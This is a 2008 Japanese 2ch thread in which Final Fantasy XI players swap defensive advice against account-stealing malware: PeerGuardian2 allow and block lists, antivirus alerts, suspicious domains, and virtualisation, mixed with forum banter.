何を考えていたんだろうね・・・馬鹿というより、異常者としか思えない件。

あ、ここは2ちゃんねるだtt

78 名前:既にその名前は使われています:2008/08/04(月) 23:46:45 ID:T0KBlXzu
PG2入れたんだがFFの許可リストってやつくれ?

79 名前:既にその名前は使われています:2008/08/04(月) 23:50:26 ID:45uPIC7b
今北産業の人のために、前スレ886の異常者っぷりの解説。

>902 :886:2008/08/04(月) 14:41:57 ID:FRmdJN3c
> ●使用ブラウザIE バージョンは分かりません。
> ●WindowsUpdateの有無 してません。
> ●FlashPlayerとRealPlayerのバージョン わかりません。
> ●アンチウイルスソフト   使ってません。
> ●その他のSecurty対策(Spybot S&D、ルータ、等) してません。
> ●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) 無

垢買い以前に、垢ハクされて当然だっつーのwwww

80 名前:既にその名前は使われています:2008/08/04(月) 23:52:03 ID:j7ZZp298
所詮ID:FRmdJN3c はカスってことw

81 名前:既にその名前は使われています:2008/08/04(月) 23:52:08 ID:bIktjNx8
いやいや垢買いRMTはゲームをより楽しくするスパイスみたいなもんじゃてぇぇw
垢ファックされるのは自分が間抜けなだけのはなしよwwwwwwwwwwwwwwww


82 名前:既にその名前は使われています:2008/08/04(月) 23:53:39 ID:bIktjNx8
間抜けにも一度ファックされ

たんだからよw次はないように注意していこうぜぇえぇえwwww

83 名前:既にその名前は使われています:2008/08/05(火) 00:08:08 ID:3h9BYYKp
>>79
PCを家電やケータイやゲーム機感覚で購入した人は大体そんなものですよ。

84 名前:既にその名前は使われています:2008/08/05(火) 00:09:10 ID:JAMu363a
リネ2は公式ページの目立つところにリンクを貼り
ウィルスの挙動まで含めた注意喚起を行いました

リネ2公式
ttp://lineage2.plaync.jp/
不正アクセスにご注意ください
ttp://lineage2.plaync.jp/bbs/view.aspx?bid=1&iid=7397
現在流行しているウイルスについて
ttp://lineage2.plaync.jp/bbs/view.aspx?bid=1&iid=7371

スクエニもこれくらいやってくだちい(´・ω・`)

85 名前:既にその名前は使われています:2008/08/05(火) 00:29:17 ID:D096w8/H
>>84
どんな感じか見てきた。
ほんとFFでもこれくらいはやって欲しいね。

公式自体見ない人もいるし、公式は見るけど自分だけは大丈夫って思ってる人は
わざわざリンク確認しないんだろうけど・・・

86 名前:既にその名前は使われています:2008/08/05(火) 00:30:37 ID:XwUU9PeN
ROなんてマップ移動のロードのたびにRMT禁止と不正アクセス防止の絵が出てくるぞw

87 名前:既にその名前は使われています:2008/08/05(火) 00:39:02 ID:M9aqFk6+
福建中華のYouTubeモドキ再び。
Domain name: youtubles■net

fu jian long yan xi bizhen shi qiao tou cun 58hao
longyan FJ 364000
cn

気をつけてくれよな!

88 名前:既にその名前は使われています:2008/08/05(火) 01:00:31 ID:A4FFR7Gl
Flashなどのブラウザプラグインを最新版に、IPAが7月の呼びかけ
http://internet.watch.impress.co.jp/cda/news/2008/08/04/20474.html


>>78
>>10


89 名前:既にその名前は使われています:2008/08/05(火) 01:32:56 ID:U78qSbhe
>>78
PG2で許可FireWallもどきを作るにあたって、拒否側はP2Pリストをブロックに
登録でいいのかどうかがいまいち不明
バスター系ソフトのFireWallだと、POL.exeの通信先をexeの動作で固定できるけど
PG2だとどうなるのか、そこがわかってません

90 名前:既にその名前は使われています:2008/08/05(火) 01:34:41 ID:EH+nxMLU
>>79
× ●WindowsUpdateの有無 してません。
○ ●WindowsUpdateの有無 WGA通らないからできません。

91 名前:既にその名前は使われています:2008/08/05(火) 01:39:35 ID:EpPmzqYt
自動更新ならWGA関係ないんだがな・・・w

92 名前:既にその名前は使われています:2008/08/05(火) 01:41:24 ID:U78qSbhe
>>87
福建中華が使っているIPは「61.139.0.0-61.139.127.255」ですね
ずっと追いかけて調べてましたけど、みんなソコにハマってました
リネ資のPG2拒否リストにしっかり入ってるから、間違って許可しなければ
大丈夫な気がする・・・


・・・って、ここに書いちゃってよかったかな

93 名前:既にその名前は使われています:2008/08/05(火) 07:01:15 ID:dKrAcyfJ
>>78
以下の内容でテキストファイルを作成
FF11:61.195.48.0-61.195.55.255
FF11:61.195.56.0-61.195.59.255
FF11:61.195.60.0-61.195.63.255
FF11:202.67.48.0-202.67.63.255
FF11:219.117.144.0-219.117.159.255

このファイルをリストに登録してAllow(許可)にする事によってPC上のプログラムは
FFのアドレスに接続する事ができる。(他のファイルで拒否の登録がされていても)

以下の内容でテキストファイルを作成
ALLIP:0.0.0.0-255.255.255.255

このファイルをリストに登録してBlock(拒否)にするとPC上で走っているプログラムは
許可されているIP以外には一切接続できなくなる。

つまり、この二つをリストに追加する事で、君のPCはFF専用マシンになる。

94 名前:既にその名前は使われています:2008/08/05(火) 08:45:43 ID:Hm3tz/m8
あれ、PG2今でもDLできる? 昨日から試しているんだけど、画面真っ白になってできないけど。
ブラウザの設定きつくし過ぎているのかな。

95 名前:既にその名前は使われています:2008/08/05(火) 09:02:06 ID:LttZ30io
ttp://db.vanamon.comって危ないところだっけ?xrea.comだし


今不用意に踏んじまった・・アーガスチェック今してるけど判定結果がなかなか出ないんだ

96 名前:既にその名前は使われています:2008/08/05(火) 09:09:19 ID:F90htN7b
なんの脈絡もなくヴァナモンとかなんなの?死ぬの?

97 名前:既にその名前は使われています:2008/08/05(火) 09:46:20 ID:o8qdC/V7
>>95
張るな阿呆。

マジレスするとXreaに限らず、危険な所はいっぱいある。
というか、安全なサイトなんて無いに等しい。
FFプレイしてるPCでネット観覧なんてしない方がいいよ。




98 名前:既にその名前は使われています:2008/08/05(火) 10:35:37 ID:OhijuoY7
>>95はいつものヴァナモン粘着。
毎度毎度よく飽きないぜ。

99 名前:既にその名前は使われています:2008/08/05(火) 10:40:59 ID:o8qdC/V7
マジかよ、クソったれ。

100 名前:既にその名前は使われています:2008/08/05(火) 10:54:35 ID:2ZePyXr+
PC起動するとPG2が韓国と台湾のIP弾いてるんだけど何かしらこれ

101 名前:既にその名前は使われています:2008/08/05(火) 11:10:46 ID:mSCO7I3W
こんにちは。リーダーに教えてもらってここへきました。
パソコンでFFをしています。
パソコンは家族で共用しているので、インターネットもみてます。
それで、最近パス抜きとかがあるというので不安に思っていたのですが、こないだからFFをやろうとすると
ウィルスバスターが不審な変更を拒否しましたという警報みたいな注意を出しています。
これは、うちのパソコンがウィルスにかかっちゃったということなのでしょうか。
いまFFでパスワードとか入力しないほうがいいですか?

102 名前:既にその名前は使われています:2008/08/05(火) 11:23:38 ID:dKrAcyfJ
>>101
テンプレとか読みましたか?
見てないなら、このリンクを先に読むといいかも。
http://miku.a.orn.jp/miku2/

103 名前:既にその名前は使われています:2008/08/05(火) 11:26:17 ID:ZgQetQRD
>>101
テンプレを全部読むと恐怖に愕然とします

104 名前:既にその名前は使われています:2008/08/05(火) 11:29:23 ID:Hm3tz/m8
>>101
自分専用のPC持てなければPCでFFするのやめた方がいいぞ。
極端な話ではなくFF関係ないサイトにすら罠仕込まれるのが現状。
ここで質問するより被害まとめサイト見た方がいい。

後半の質問にだけ返すとFFに関係ない無害な変更でも警告やブロックは出るから
一概に垢ハックかどうか判別できないね。

105 名前:既にその名前は使われています:2008/08/05(火) 11:35:23 ID:HbaiKcB9
すまん疑問に思った事があるので誰か答えてくだしあ
PCが2台あったとする、FF含むPC(A)と低スペックのネットくらいしか見られんPC(B)
それで、Bが垢ハックウィルスに感染した場合、ルータ通してAに感染とかあるの?

最近兄貴がFF復帰して情報が欲しいとか言ってたんだが垢ハックあるから
ネットでFF関連調べるのやめとけとは言っておいたんだが、
やっぱ窮屈だろうなって事ではっきりしておきたかった

106 名前:既にその名前は使われています:2008/08/05(火) 11:47:56 ID:ZGJBobt7
今の所LAN経由で感染する機能はを持ったものはないと思われる
今後そういうバージョンが出てくるかは不明


107 名前:既にその名前は使われています:2008/08/05(火) 11:48:00 ID:dKrAcyfJ
>>105
可能性はある。まずPC間でのファイル共有などを全てオフにする。
XPでは初期状態はオンになっている。オフにする方法は自分で調べてくれ。
リモートアシスタント、リモートデスクトップもオフ。
PC(A)にPG2を導入して>>93を適用する。
PC(B)では既出の処置をする。Firefox&NoScript他
ルーター設定からUPnPって設定がある場合はオフにする。
PC(B)のサービスからSSDP Discovery ServiceとUniversal Plug and Play Device Hostをオフにする。
このぐらいすれば安心かな。

108 名前:既にその名前は使われています:2008/08/05(火) 11:50:43 ID:mSCO7I3W
101を書き込んだものの母です。
>>102-103さん、ご回答ありがとうございました。
書き込んだ本人は張ってくださったリンク先をみたりもしたようですが、「テンプレ」がなにかわからなかったらしく私が呼ばれました(笑
さて、テンプレ内容ですが正直いって私にも少々内容が難しいので勉強しつつ、主人が戻りましたらこちらを見せてPCのチェック等をして対策したいと思います。
皆様、ご親切にご指導いただき本当にありがとうございました。
なお、最後になりますが娘がウィルスだといってメモったものがあるので、内容を書き込ませてください。

8/4 15:40 拒否 C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
   15:40 確認 C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe

種類:API Event
検出ソース/プロセスID:NtUserSetWindowsHookEx
ファイル名:C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
該当ポリシー:DLL(プログラムライブラリ)インジェクション
実行した処理:拒否

上記です。
「拒否してるんだから大丈夫じゃないの」と言ったんですが、聞け聞けうるさいので教えてあげてもらえないでしょうか。
ここで回答が得られない限り安心できないようです(笑

109 名前:既にその名前は使われています:2008/08/05(火) 11:53:09 ID:ZGJBobt7
家族で2chフイタwwwwwwwwwwww

110 名前:既にその名前は使われています:2008/08/05(火) 11:58:34 ID:/uJ74QKU
>>108
バスター使ってないからアレだけど、DLLインジェクションってヤバくね?w

今、話題のウィルスはウィルス定義が最新ならバスターで検出できたはずなんだけど・・・
定義が最新じゃなかったら感染してるかもなw

111 名前:既にその名前は使われています:2008/08/05(火) 11:58:35 ID:nMCNF7hE
前スレで頻繁に出てきてた誤検出のやつ?かな

112 名前:既にその名前は使われています:2008/08/05(火) 12:06:27 ID:dKrAcyfJ
>>108
とりあえず自分はウィルスバスターを使用してないないので詳しくは判らないですが
過去のスレッドでは誤認ではないかとの事でした。
しかしウィルスの可能性もあるのでスキャンをしてみるのが良いかと思います。
後、ウィンドーズのアップデート、各プログラムのアップデートもお忘れなく。

113 名前:既にその名前は使われています:2008/08/05(火) 12:20:14 ID:lc9NOKVQ
分からないことがあるのに分からないままにしておくよりは、親御さんに聞いてでも
しっかり対策したほうが偉いね。これから親子でセキュリティ頑張ってくれ。
ただしこのスレで何でも聞けばいいってもんではないからある程度は自分で調べてね

114 名前:既にその名前は使われています:2008/08/05(火) 12:22:03 ID:krsYnpHJ
>>108 カーサンに免じてスレ違いに答えるw
バージョンが2008 ウィンドウスアップデートや そのほかのアプリケーションのアップデートはきちんとされていると仮定します。違う場合はスルーしてください。
ウィルスバスターのメイン画面を起動して
ウィルススパイウェア対策の 不正監視の変更の DLLインジェクションが「常に拒否」になってたりはしませんか?
もしそうなら 処理を確認するにしてみてください。
この確認には パスワードが必要かも知れません。
もしパスワードが設定されているなら 設定をカスタマイズしているということなので設定したご本人(101さんのお父様でしょうか?)に確認するのが一番早いです。
誤検出に関しては パッチ済みだったと記憶しております。
NtUserSetWindowsHookExでグーグル検索すると 
この例が結構ヒットしますので確認の上アップデートと検索をしてください。

ご家族のうち お父様だけがPCの管理をしていらっしゃるようですが
ご家族でお使いのご様子、 お嬢様 奥様ともにインターネットの最低限の知識を身につけてご利用になることをお勧めいたします。

115 名前:既にその名前は使われています:2008/08/05(火) 12:23:19 ID:08LEbksP
カスペルスキーオンラインスキャン汁↓
ttp://www.just-kaspersky.jp/products/try/onlscan.html

FlashplayerのVer 9.0.124.0 これ以外のVerならやられますよ
Realplayerの有無  入ってるとやられる可能性高いですよ
WindowsUpdateの有無 常に最新にしておかないとやられちゃいますよ

116 名前:既にその名前は使われています:2008/08/05(火) 12:25:54 ID:/zQeZCdt
J( 'ー`)しカーチャン

117 名前:既にその名前は使われています:2008/08/05(火) 12:30:53 ID:GviG4IPN
101の彼氏です,
状況を詳しくお願いしたい。
昼飯をご馳走になったが少々塩が強すぎかと思われます。

118 名前:既にその名前は使われています:2008/08/05(火) 12:35:32 ID:R2+TH1q0
だめだこの家族

119 名前:既にその名前は使われています:2008/08/05(火) 12:36:43 ID:/zQeZCdt
吉野屋のコピペ想い出した。

120 名前:既にその名前は使われています:2008/08/05(火) 12:38:34 ID:l3p2CsZi
カーちゃんは30代だな

121 名前:既にその名前は使われています:2008/08/05(火) 12:40:42 ID:lc9NOKVQ
お前ら人妻と知った途端に手の平を返すんじゃないw

122 名前:既にその名前は使われています:2008/08/05(火) 12:42:10 ID:/uJ74QKU
いやいや、そこはネタだろwww

123 名前:既にその名前は使われています:2008/08/05(火) 12:43:06 ID:STrIPs3s
カスペルスキー導入後、「worm Helkern IP(中国系)からの攻撃をブロックしました」って頻繁に出るのですが、これは何ですか?気持ち悪いです><

124 名前:既にその名前は使われています:2008/08/05(火) 12:45:06 ID:QuBsXG8N
今さらだがPeerGuardian2導入しようと思ったらリンク切れててできなかった件

125 名前:既にその名前は使われています:2008/08/05(火) 12:56:43 ID:f3W24S+v
日本語版がダメなら英語版を入れるんだ

126 名前:既にその名前は使われています:2008/08/05(火) 12:58:42 ID:dJg7/res
>>101に釣られすぎw


127 名前:既にその名前は使われています:2008/08/05(火) 13:03:37 ID:pDZDqfkj
101と108同じIDやんかwww

128 名前:既にその名前は使われています:2008/08/05(火) 13:04:02 ID:/uJ74QKU
>>123
ルーター買えw

129 名前:既にその名前は使われています:2008/08/05(火) 13:05:51 ID:whbK6lKQ
>127
家族なんだから当たり前だろう!

130 名前:既にその名前は使われています:2008/08/05(火) 13:06:06 ID:ZGJBobt7
>>127
そりゃ、家族で同じPC使ってるなら同じIDだろwwwwwwwwwwwwww

131 名前:既にその名前は使われています:2008/08/05(火) 13:06:08 ID:neNlBUKx
>>127
家族でPC共有してるんだから=おんなじPCからカキコだからID一緒なんじゃね?



132 名前:既にその名前は使われています:2008/08/05(火) 13:07:33 ID:/zQeZCdt
>>127
の人気にshit

133 名前:既にその名前は使われています:2008/08/05(火) 13:12:05 ID:GcdLckwL
ps3最高 大画面で寝転んでネットもできるし 起動も超速い macとかps3とか少数派はウイルスかかににくい 

134 名前:既にその名前は使われています:2008/08/05(火) 13:12:33 ID:yL8bj8sr
PG2ダウンロードできなくなったのはこの記事関係あるのかな?
ttp://phoenixlabs■org/2008/02/21/peerguardian-now-with-viruses/


135 名前:既にその名前は使われています:2008/08/05(火) 13:12:39 ID:dJg7/res
馬鹿だなおまいらw
>>101の質問に対してレスのつきがよくないから
>>108で母として光臨だろ?w

娘が聞け聞けっていうものでってw
そして用事(聞きたい事)が済んだらドロンwww

136 名前:既にその名前は使われています:2008/08/05(火) 13:12:43 ID:R2+TH1q0
>>123
放置。

137 名前:既にその名前は使われています:2008/08/05(火) 13:15:38 ID:mSCO7I3W
101母です、ご飯食べてました。
>>112さん、ありがとうございます。私も前スレ見てみますね。
>>114さん、途中までやってみましたがやはりパスワード要求されましたので、
主人が戻りましたらここを見せてもう一回やってみます。
>>115さん、カペルスキーのオンラインスキャンですか。
これくらいなら私にもできそうなので早速やってみます。
ウィンドウズアップデートは今やってみたらwindowsXP ServicePack3がまだ入っていないようです、
入れたほうがいいですよね?

どうもスレ違いになってきているようですし、いろいろと方向は指し示していただけたので、これを機会に少し勉強しようと思います。
娘には可哀想ですが、安全が分からないので今日のFFはあきらめるよう言いました。
不安がりようが見ていて可哀想なので、早く安全を確認してあげたいです。
それでは消えます。お世話になりました。

138 名前:既にその名前は使われています:2008/08/05(火) 13:22:53 ID:vpeqSQLo
始めてきたっぽい母が「スレ違い」なんて言うかよw
全ての語尾に「。」があるから同一人物だし

139 名前:既にその名前は使われています:2008/08/05(火) 13:24:32 ID:Hm3tz/m8
>>134の記事見てきた、英文でわからなかった。

最初の一文だけで判断するとウィルスが仕込まれているらしいけど、
どの過程かわからないから英語版落としてきたけど、ちょっとためらうな。
誰か英語わかる人翻訳お願いしますだ。

140 名前:既にその名前は使われています:2008/08/05(火) 13:26:02 ID:Z24ThRzv
あれじゃね鬼女板の住人なんじゃね?w

141 名前:既にその名前は使われています:2008/08/05(火) 13:29:18 ID:dJg7/res
>>135で煽ったら>>137が即釣れたwお母様タイピング早すぎw

>101母です、ご飯食べてました。
>114さん、途中までやってみましたがやはりパスワード要求されましたので、
飯食ってたのか確認作業してたのかどっちですか?w

まぁ煽りはここら辺までにしておいて、実際スパイウェア仕込済ならFFログイン控えても何の解決にはなりませんよと。
逆に不正ログインの可能性あって現状判断できる知識がないなら、ログインして不正アクセスを即目視できるように
パパスが帰ってくるまで画面張り付いてたほうがいいw

142 名前:既にその名前は使われています:2008/08/05(火) 13:32:13 ID:3DBogvt1
編: ええ、ですから、オンラインゲームにおける保険業というのが、現実味を帯びてきたというか、すでにニーズがあると思うんですよね。
田中氏: ウチも保険屋さんをそろそろ……。
Sundi氏: じゃあ子会社作りますか!
田中氏: サンディ・インシュアランス?(笑)。

(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)

143 名前:既にその名前は使われています:2008/08/05(火) 13:41:33 ID:JpM0FCGI
おまいら母に噛みつきすぎwww

てか135は母みてないんでね?
見てたとしても華麗にスルーしてるあたり熟練ねらーだと思うが。
ここにきたのは初めてかもだが、みたかぎり母は初めてとは書いてないね。
娘はそれっぽいが。


144 名前:既にその名前は使われています:2008/08/05(火) 13:45:10 ID:HbaiKcB9
>>106>>107
レスサンクス
まずBの方にある更新してないソフト探して最新の物にするように言っておきます
AをFF専用にPCに、というのが一番簡単で安全な方法なのかもしれないけど…
Aが俺のFF兼私事PC、Bが兄の私事PC、なのでそれは厳しいのだ俺の財布的に考えて

しばらくは兄の質問に俺が答えるって形で納得して貰います

145 名前:既にその名前は使われています:2008/08/05(火) 13:58:26 ID:dJg7/res
>>144
あくまで>106の言うとおり現状としては。って部分をしっかり認識しとこうな。
6月中旬〜下旬にかけて猛威振るってるタイプに関して言えばFlash最新+パス保存はしない
これだけやっておけば、抜かれることはまずないと思う

ただし今後と言う意味でなら色んな感染の可能性もあるわけだ。被害広がって初めて傾向と対策が作り上げられてる現状だからね
一番有効なのは>93の例じゃないかな

146 名前:既にその名前は使われています:2008/08/05(火) 13:59:41 ID:tmyHudgZ
前スレで出てきてたウィルスだけど、大体各社検出できるようになったみたい。

ttp://www.virustotal.com/analisis/d17fd341f1142e39b00db34e6f68432a

有名どころはほぼ対応完了かな。
検体送った方お疲れ様でした。

NODが×になってるがEset Smart Securityの方では検出できることを確認。

147 名前:既にその名前は使われています:2008/08/05(火) 14:01:18 ID:krsYnpHJ
>>139
>>134の記事は PG2のリスト Bluetack’s level 1 blocklist が NOD32を拒否ってたから
ウィルス認定されちったよーんw ってこと
日本語化が落とせないのは おいてるサーバ flnet.orgが7月からリニューアルしてて
Dukedogさんが 対応してないとかじゃないかと思う


148 名前:既にその名前は使われています:2008/08/05(火) 14:02:35 ID:tmyHudgZ
ってsymantecが検出できてないじゃないか…

149 名前:既にその名前は使われています:2008/08/05(火) 14:03:24 ID:dJg7/res
古いソースだけど一応張っとく
ttp://mozilla.jp/firefox/security/

IEは色んな意味で危険だぜw

150 名前:既にその名前は使われています:2008/08/05(火) 14:10:08 ID:HbaiKcB9
>>145
普段からこのスレ見てるのでその辺は大丈夫だと思う、一応最低でも自分のPCは対策してあるので
兄弟とはいえいちいち人のPC見るのもどうかと思ってたから、Bの方でちゃんと対策してあるかわからないんだよね
あと>93見ると、そのPC設定をしたPCはFF専用PCになってしまうみたいだからやりたくないのだ
>ただし今後と言う意味でなら色んな感染の可能性もあるわけだ。
ここが一番気になる所、最新でも抜かれたらどうしようもないよねって感じで>105の質問したのね
俺だけならネット見ないとかで防げるだろうけど、どうしても不安になる
最近2ch専用ブラウザのJane導入してほぼネット見ないような状態だし

151 名前:既にその名前は使われています:2008/08/05(火) 14:16:24 ID:dKrAcyfJ
>>144
PG2はタスクアイコンからオンオフできるので、FFやってる最中に情報調べないなら
PG2の>>93全IPリスト有効、終わったら全IPリスト解除してリネージュ資料室のリスト
等をオンにできたりする。まあ、どっちにしろ必ずしも安全ではないし不便だが
最新のウィルスにはある程度有効だと思う。

ネット専用PCに手が出なくても今持ってるPCの性能が良い場合は頑張って
勉強してVMwareとLinuxの導入を検討してみるのが一番いいと思う。

152 名前:既にその名前は使われています:2008/08/05(火) 14:17:58 ID:krsYnpHJ
>>150 だったら バーチャルPCとかブラウザの仮想化はどう?
virtualboxで古いOSだけどvinelinuxなら導入が簡単でPENIIのノートくらいには使えるし 
環境設定済みのvirtualbox用ubuntsなんてのもある。こっちだと7zが必要かも。
前スレの梅にでてた safespaceっていうので ブラウザの仮想化すれば
仮想化した状態ではお気に入りの追加やダウンロードはできないけど 本体に影響はないしキーロガーにも対応してたと思う。
赤枠でるから 見た目はイヤンだけどなw





153 名前:既にその名前は使われています:2008/08/05(火) 14:22:34 ID:Hm3tz/m8
>>147
翻訳とリニューアルの情報ありがとう!

再インストール前にも入れてたからやり方はわかるし日本語版のリンクが復活するまで
英語版で対応しておくことにします。

154 名前:既にその名前は使われています:2008/08/05(火) 14:28:47 ID:HbaiKcB9
>>151>>152
なるほど、ググってみた。仮想化ってすげえな
仮想化を導入してみるという方向で頑張ってみる、サンクス

155 名前:既にその名前は使われています:2008/08/05(火) 14:32:06 ID:tmyHudgZ
仮想化(ブラウザ)はまだ発展途上。
本格的にはもう少し先になるかもな。

仮想PCなら充分実用範囲だが。

156 名前:既にその名前は使われています:2008/08/05(火) 14:39:05 ID:A4FFR7Gl
エロイ人教えて

今週の週刊アスキーに「USBメモリーにUbuntu!」っていう記事があるんだけど、それでWeb閲覧環境を作ったとして
それでそっちでこの一連のウィルスのに感染したとしたら本体のWindows環境にも感染する?

157 名前:既にその名前は使われています:2008/08/05(火) 14:53:43 ID:f3W24S+v
Linuxが感染する訳無いだろう・・・

158 名前:既にその名前は使われています:2008/08/05(火) 15:01:51 ID:dKrAcyfJ
ウィルスの大半はウィンドーズ用に作成されたものが多いのでLinuxが感染する確立は非常に低い。
まったく無いとは言えないが、許可なしに知らないプログラムを勝手にインストールさせないLinuxは
Windowsよりかなり安全と言える。

記事読んでないので詳しくは判らないが、仮想環境を作ってUSBに導入した場合は

たとえLinuxが感染したとしてもメインのOS(Windows)とゲストOS(Linux)同士で
ファイルの共有の設定をしてない場合はファイルが隔離されているので
二つのPCを使っているような感じで、ゲストOSが感染しても大事なファイルを
ゲストOSに導入していなければほぼ安全。

USBからデュアルブートしてる場合は

1台のPCとしてファイルを共有しちゃうので、安全性が少し落ちる。
しかもLinuxかWindowsどちらかを立ち上げるには再起動が必要になりめんどくさくなる。

159 名前:95:2008/08/05(火) 15:16:10 ID:LttZ30io
すまね;動転して張っちまった

ヴァナモン厨呼ばわりは心外だ。
Wikiの中尉アサルトでケルベロスのWS一覧のとこに貼ってあったんだよ
で、踏んだ後で「しまった!これヤベーとこじゃ?」と思って諸兄に聞いたほうが
早いと思って尋ねたんだ。

PG2、ノートン入れてあるパソコンで、IFRAME、Javaは全部切ってる。
アーガスはブラックじゃないと出たが・・・心配でね; 
(テンプレのチェックはしてWin32ファイルも確かめたんだが・・・)


160 名前:既にその名前は使われています:2008/08/05(火) 16:15:05 ID:dJg7/res
>>159
テンプレの確認法とってなお不安抱えるならクリーンインストールしかないよ

よく質問で「大丈夫だとは思うけど、やっぱり心配で」って言う人多いけどさ
逆に聞くと感染してるかもって認識もったPCを放置してて平気なのか?

161 名前:既にその名前は使われています:2008/08/05(火) 17:29:00 ID:FDL7oTjX
「仮想環境」で、ちょっと思ったんだが、
WindowsOSを「非」管理者権限で使うのって、どう?(あいまいだけど。)

みんな、管理できるかどうか関係無く、管理者権限付きで使ってるよね?
UNIX系OSの運用でよくやる、普段は一般ユーザー、必要なときだけrootになるっていうのを
Windowsでやった場合、どのくらい効果あって、どんだけ不便になるのかな?

162 名前:既にその名前は使われています:2008/08/05(火) 17:30:07 ID:FDL7oTjX
ああ、ウィルス対策として不完全なのはわかるけど、どの「程度」なのかとねw
ぜひ、そうしたいとかじゃなくて、ちょっと思っただけw

163 名前:既にその名前は使われています:2008/08/05(火) 17:49:06 ID:R2+TH1q0
UsersとかPower Usersとかいろいろあるんだけど
Win9xあたりから開発してる人は気にしないからか
無駄に管理者権限を要求するインストーラやアプリが多い。
で、ユーザも管理者権限常用するようになる
(それでVistaのUACができた)。

Administratorsに属する"foo"さんではだめで
"Administrator"さんじゃなきゃだめという
すごいアプリも見たことがある。

164 名前:既にその名前は使われています:2008/08/05(火) 18:04:22 ID:gQ07+cxs
suにあたるコマンドが無いからなぁ
Win2kだと、ショートカット作らないと別ユーザーで実行することすら
ままならんのだが、その辺どうなったのかね

165 名前:既にその名前は使われています:2008/08/05(火) 18:21:15 ID:FDL7oTjX
インストーラなら、想定内かなぁ。無駄はともかく。
suして、make installみたいな感じだよね。
で、そのsuが無いのは、GUIゆえの不便さみたいなトコなんで大目に見るのかな。

FFXIとブラウザがあればイイです、みたいなヒトなら不便はないのかね。

166 名前:既にその名前は使われています:2008/08/05(火) 19:49:02 ID:R2+TH1q0
WinNTで別ユーザで実行というのはrunasがあるけど
GUIに慣れてると使いづらいのよね。

167 名前:既にその名前は使われています:2008/08/05(火) 20:45:18 ID:CJFmfe+7
下がっているのでageときますね

168 名前:既にその名前は使われています:2008/08/05(火) 20:56:56 ID:zQJ9cncL
最盛期に抜かれて久しぶりに見に来たんだが、前に比べると被害は減っているのかしらね

169 名前:既にその名前は使われています:2008/08/05(火) 21:11:00 ID:Sim0EzZs
親父はまだかーーーーーーーーーーーーーー!!!!!!!!

170 名前:既にその名前は使われています:2008/08/05(火) 21:41:41 ID:mcfTLm7+
>>168
地域フィルタ設けたし、ちょっと減ったかな
最大原因のユーザーのセキュリティ意識がいまだ低いままだから
新種現れたらまた増加するだろうけど
ゲストログインを自分でon/off設定ぐらいできるようにはならないのかね

171 名前:既にその名前は使われています:2008/08/05(火) 21:47:51 ID:87AhO3NS
そのうちPOLメールに添付ファイルついてきて・・・とか妄想した


172 名前:既にその名前は使われています:2008/08/05(火) 21:52:54 ID:zQJ9cncL
>>170
7/10に復旧依頼だしてまだメール来てないんだが、復旧してももーちょっと落ち着くまでは様子見にしておくかねぇ

173 名前:既にその名前は使われています:2008/08/05(火) 22:02:48 ID:lc9NOKVQ
>>171
きっとそのアドレスはsupport@plaionline.comだな

174 名前:既にその名前は使われています:2008/08/05(火) 22:04:41 ID:mcfTLm7+
>>171
POLにきたメールでもウィルス感染すんのかな
>>172
今すぐやりてぇ!ってわけじゃないなら、そのほうがいいかもね
次はどんな手でくるかわからんし、ちょっと様子見したほうがいいかもしれない

175 名前:既にその名前は使われています:2008/08/05(火) 22:17:40 ID:zQJ9cncL
□eも次世代MMOの開発してんなら、11の時点で対応策を試してみてノウハウを蓄積させておくべきだろーに
壮大な実験()笑 で犯した失敗をそのまま持ち越したら、それこそ愚の骨頂だと思うんだがな

176 名前:既にその名前は使われています:2008/08/05(火) 22:50:18 ID:qUo1mgjU
avasutoきったら軽いぜ・・・

177 名前:既にその名前は使われています:2008/08/05(火) 22:53:53 ID:PKvYIuQp
>>175
垢ハックは復旧措置をツクッタ時点でどうでもいいんだろ
気に入らないなら解約しろって

178 名前:既にその名前は使われています:2008/08/05(火) 23:33:22 ID:9XUmHMGq
対応の人件費は膨大だと思うが。
数千万くらい無駄になってないか。

179 名前:既にその名前は使われています:2008/08/05(火) 23:40:21 ID:1m6R0ULS
>>173
今なら無差別爆撃しても結構釣れるな。
スクエニがhtmlメール飛ばしてくる時点で論外だ。

180 名前:既にその名前は使われています:2008/08/05(火) 23:43:47 ID:LeVb83eu
>>178
人件費?復旧のための社員が増員されてたり、給料がふえるとでも思ってるの?
このご時勢、増員なしで残業させてるんでしょうに。サービス残業でね

会社への直接的な被害はそれほどないんじゃないかな〜

181 名前:既にその名前は使われています:2008/08/05(火) 23:52:15 ID:OoiGIFLB
>>177
チャットでアカウントハックの件で、今後何かするのか質問したら
一応、かなり重く受け止めていて、何らかの対応策をとる予定と回答来た
んだけどね・・・まぁ定形の返答文書なのか、本気か嘘か判らないけどさ。

182 名前:既にその名前は使われています:2008/08/05(火) 23:54:25 ID:zQJ9cncL
>>181
っ対応マニュアル

183 名前:既にその名前は使われています:2008/08/06(水) 00:18:28 ID:6/0krTMQ
>>171
RMT業者を名乗ったメールが来た事あるな、PC用なのかPOLでは文字化けしたメールだった

思いっきり怪しかたからメールで■eに報告したがいつもの定型文しか帰ってこなかったぜた

184 名前:既にその名前は使われています:2008/08/06(水) 00:20:44 ID:wuxKve7S
ああ、あったねー
多分あれは @pol.com 宛のランダムでの配信だったんだろうけど
PS2からだと文字化けして読めなかったのあったな

185 名前:既にその名前は使われています:2008/08/06(水) 06:30:24 ID:2RrgA8Nd
なんかネット開くとこの証明は〜〜だけに有効です。ってエラーがでるようになったんだが・・・
ウィルスっぽいの感染しちゃったかな・・・
でも仕事だから家でなくちゃいけないOrz

186 名前:既にその名前は使われています:2008/08/06(水) 06:44:57 ID:tFPmVnTs
>>185
証明書の期限が切れただけなのでは?
とりあえずテンプレ嫁

187 名前:既にその名前は使われています:2008/08/06(水) 08:20:09 ID:NKORBWTj
今カスペでオンラインスキャンできないんだけど俺だけ?

188 名前:既にその名前は使われています:2008/08/06(水) 09:05:07 ID:Xs/gP1az
俺も404出るな

189 名前:既にその名前は使われています:2008/08/06(水) 09:33:00 ID:qbmYVvAc
カスペのオンラインスキャンが使えなきゃ@niftyウイルスチェックサービスを使えばいいじゃない

190 名前:既にその名前は使われています:2008/08/06(水) 10:35:06 ID:hejMR+aD
クズエニ死ね

